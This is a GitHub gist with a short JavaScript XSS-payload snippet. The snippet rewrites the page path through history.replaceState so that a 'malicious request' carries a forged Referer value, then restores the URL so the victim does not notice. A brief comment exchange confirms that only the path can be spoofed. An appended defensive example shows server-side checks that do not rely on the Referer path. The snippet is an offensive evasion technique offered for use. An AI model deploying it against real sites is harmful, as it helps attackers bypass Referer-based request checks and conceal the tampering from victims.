Last active
May 8, 2024 10:01
Code Snippet to Set 'Referer' Header using JavaScript (e.g. XSS Payload)
// Save the current URL path to restore after making
// malicious request with faked referer header value
var savedPath = window.location.pathname;
var savedSearch = window.location.search;

// Change URL/History to control the referer header value
// Swap out "/this-is-my-fake-referer-value" to be what you need
window.history.replaceState(null, '', '/this-is-my-fake-referer-value');

// Send malicious request with faked referer header value
// NOTE: this assumes you're using some xhr request, adjust
// based on whatever your XSS payload is actually doing
xhr.send(body);

// Restore the URL value to the original one before
// the XSS victim notices their location bar changed
window.history.replaceState(null, '', savedPath + savedSearch);
Is it possible to change the entire referrer header? Not the "/this-is-my-fake-referer-value" part. Is it possible to change it like "http://referer.com"?
I'm afraid not, you can only control the relative path under the host.
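What the snippet and the reply above mean for server-side checks, as an added example that is not part of the gist or written by its author: the Referer path is whatever same-origin script last set with `replaceState`, so it is not evidence of which page sent a request, while the origin part still is. The origin `https://app.example.test`, the path `/account/confirm-delete`, the `confirmStepDone` session field and the sample requests are all constructed for illustration.

```javascript
'use strict';

const APP_ORIGIN = 'https://app.example.test';  // assumed application origin
const CONFIRM_PATH = '/account/confirm-delete'; // hypothetical confirm page

// Parse an Origin/Referer value; null when absent or malformed ("null" included).
function parseSource(value) {
  if (!value) return null;
  try { return new URL(value); } catch { return null; }
}

// Weak gate: treats the Referer path as proof the user was on the confirm page.
function weakGate(req) {
  const ref = parseSource(req.headers.referer);
  return ref !== null && ref.origin === APP_ORIGIN && ref.pathname === CONFIRM_PATH;
}

// Hardened gate: Origin/Referer only answers "same origin?". The workflow step
// comes from server-side session state, which a URL rewrite in the page
// does not change.
function hardenedGate(req) {
  const src = parseSource(req.headers.origin || req.headers.referer);
  if (src === null || src.origin !== APP_ORIGIN) return false; // fail closed
  return req.session.confirmStepDone === true;
}

// Constructed sample requests (not captured traffic).
const samples = {
  // Sent from the real confirm page after the user completed the step.
  genuine: { headers: { origin: APP_ORIGIN, referer: APP_ORIGIN + CONFIRM_PATH },
             session: { confirmStepDone: true } },
  // Sent from another page on the same origin after replaceState() rewrote
  // the path: the headers are byte-for-byte the same as the genuine request.
  rewritten: { headers: { origin: APP_ORIGIN, referer: APP_ORIGIN + CONFIRM_PATH },
               session: { confirmStepDone: false } },
  // Sent from a different origin: the host part cannot be rewritten this way.
  crossSite: { headers: { origin: 'https://other.example.test',
                          referer: 'https://other.example.test' + CONFIRM_PATH },
               session: { confirmStepDone: false } },
};

function evaluate() {
  return Object.fromEntries(Object.entries(samples).map(
    ([name, req]) => [name, { weak: weakGate(req), hardened: hardenedGate(req) }]));
}

console.log(evaluate());
```

The same reasoning applies to log review: a Referer path recorded by the server shows what the address bar held when the request was sent, not necessarily the page that issued it.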